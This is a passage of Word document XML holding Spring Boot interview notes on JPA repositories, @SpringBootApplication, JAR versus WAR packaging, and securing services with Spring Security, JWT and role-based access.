    <w:p w14:paraId="3D1EB4D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0B793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829DD">
          <v:rect id="_x0000_i2635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7935EAC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84"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="7DFF4FA4" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="247DA0A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0289DD66"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escription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="2A449AEE" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="469F529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 Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69317AE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ave(), findById(), findAll(), deleteById() etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3CBAEDA9" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24F859F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 Derivation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66A0AA8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thod names like findByName() auto-generate queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1C993BA8" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A3C467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ies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2567DD1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PQL/SQL with @Query annotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4CB7D345" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D926B6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 and Sorting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352E4FC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es from PagingAndSortingRepository</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1128418E" w14:textId="77777777" w:rsidTr="00F202E9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4330E49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Boilerplate Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45BD7B1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the need to write boilerplate DAO implementations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5067A56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9ADD6D">
          <v:rect id="_x0000_i2636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33411877"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mon Superinterfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635461F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Repository&lt;T, ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373F780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agingAndSortingRepository&lt;T, ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBA37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lt;T, ID&gt; — most commonly used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA012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controller or service class using this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A4C32" w14:textId="3B6E3DF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637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB0EC8" w14:textId="13B7FB02" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="641" w:name="_Toc197867855"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @SpringBootApplication annotation in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="641"/>
    </w:p>
    <w:p w14:paraId="025FE5B7" w14:textId="367143B7"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pringBootApplication annotation is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>convenience annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot that combines three key annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC5B2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rget(ElementType.TYPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734187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ention(RetentionPolicy.RUNTIME)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E856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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73464C4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE8605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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4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pringBootApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62751B4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A43A0D"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4D46F5">
          <v:rect id="_x0000_i2638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453D49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bines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0FBD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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9987B"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pecialization of @Configuration, marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB69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AutoConfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC90E2F"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Spring Boot’s auto-configuration mechanism that automatically configures beans based on dependencies on the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31FDE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ponentScan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6AF81"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matically scans and registers beans/components in the same package or sub-packages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7DC3A"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A8128D">
          <v:rect id="_x0000_i2639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F87A5B"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nefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7AD4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liminates the need to declare each annotation separately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631F5C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boilerplate in Spring Boot applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEF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you to start the Spring context with minimal configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BD4E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DC7420">
          <v:rect id="_x0000_i2640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00732C6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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B7C1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554E7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05547B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1504468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601282F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36C9A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E2943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ingle annotation sets up component scanning, configuration, and auto-configuration for a Spring Boot app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52416B" w14:textId="066D81A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641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB52CB5" w14:textId="2D754056" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="642" w:name="_Toc197867856"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will the Spring boot application know whether its JAR or WAR type</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="642"/>
    </w:p>
    <w:p w14:paraId="51E065D9" w14:textId="780BC116"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etermines whether the application is packaged as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based on how it's configured in your </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>build tool</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Maven or Gradle) and the presence of specific classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B021E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444935">
          <v:rect id="_x0000_i2642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08108BBC"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ckaging in pom.xml or build.gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD5A59"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Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A100B3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jar&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648BBCD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9296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9151F7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Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64FF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ugins {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F98B7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org.springframework.boot' version '3.x.x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D176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java'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC392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se 'war' plugin if it's a WAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A77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war' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279524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55C722"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CB96D9E">
          <v:rect id="_x0000_i2643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC5215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Main Class Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C029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You run it with an embedded server (Tomcat, Jetty, etc.) using SpringApplication.run(...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791BE60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You exclude the embedded server and extend SpringBootServletInitializer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E542A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DE105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extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9A5E2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491B989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builder) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B90A1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sources(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC58B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E96A3" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B65E0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6E6FEBC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56B5104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3F401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8AEF0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AF0784">
          <v:rect id="_x0000_i2644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100A16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Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303CDFA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spring-boot-starter-web includes embedded Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D17C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You typically </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exclude embedded Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506729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0B4DF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5F3EAA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097E916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79C790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DCCBC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00083">
          <v:rect id="_x0000_i2645" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3981716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35E818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oesn’t automatically detect JAR vs WAR; it follows </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>your packaging typ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tartup class configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C1DB7" w14:textId="711D49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646" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13785DA9" w14:textId="0430245E" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="643" w:name="_Toc197867857"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you providing security to your services</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="643"/>
    </w:p>
    <w:p w14:paraId="15EFF4D2" w14:textId="351C15E3"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security</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically provided using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along with optional features lik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and HTTPS. Here's how security is implemented:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318FD65C"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259FC">
          <v:rect id="_x0000_i2647" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F587E"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Spring Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92C82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create a security configuration class that extends WebSecurityConfigurerAdapter (Spring Boot 2.x) or uses the new SecurityFilterChain bean (Spring Boot 3.x).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914FC5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7521B20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B8A71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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFF041" w14:textId="77777777" w:rsidR="006F4985" w:rsidRPr="002C6305" w:rsidRDefault="006F4985" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E0DCF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E8979B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FilterChain filterChain(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E81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768DAB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HttpRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E8436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tchers("/api/public/**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706DAD7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3AA578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912ED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or .formLogin(), or .oauth2Login()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E9B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ttp.build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F46C2F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B2616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E4EDCC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E2F42E">
          <v:rect id="_x0000_i2648" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278483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JWT Token-Based Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B760C0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JWT tokens to avoid storing sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB7C0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 login, generate a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565692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nd the token in the Authorization header for each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F02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idate the token in a filter before processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0DE3B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E8E89">
          <v:rect id="_x0000_i2649" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6C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Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🛡</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Role-Based Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053AF8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PreAuthorize or @Secured:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058193C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Authorize("hasRole('ADMIN')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FFD6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dmin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A5CA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adminEndpoint() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40401C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Only admin can access";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7698D55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03C4E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EE122">
          <v:rect id="_x0000_i2650" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494E413"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HTTPS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE694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force HTTPS in application.properties and generate/install SSL certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611A4B8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9425">
          <v:rect id="_x0000_i2651" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D00F0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Custom UserDetailsService</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DD2D9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fetch user credentials and roles from a database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C21C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1984D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UserDetailsService implements UserDetailsService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360953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EE519D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Details loadUserByUsername(String username) throws UsernameNotFoundException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E15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etch user from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3207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58A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60345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A30B28">
          <v:rect id="_x0000_i2652" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4CDE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721B66F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ty is implemented using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2049E1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6F225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tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B853A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ole-based access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011D35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S</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895FFD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OAuth2 for SSO or third-party logins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85A6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code samples for JWT setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEA84E" w14:textId="5F11E11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653" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7819FFBF" w14:textId="23435945" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="644" w:name="_Toc197867858"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to validate a token</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="644"/>
    </w:p>
    <w:p w14:paraId="5D6F4792" w14:textId="3FC4C30B"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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>validate a JWT token</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application, you typically do it using a filter or a utility method that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11199F4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racts the token from the request header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F004E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rses and validates the token using the secret key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3007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ecks expiration, signature, and claims</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5D5B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44FB2C">
          <v:rect id="_x0000_i2654" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5547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s to Validate a JWT Token</w:t>
      </w:r>
    </w:p>
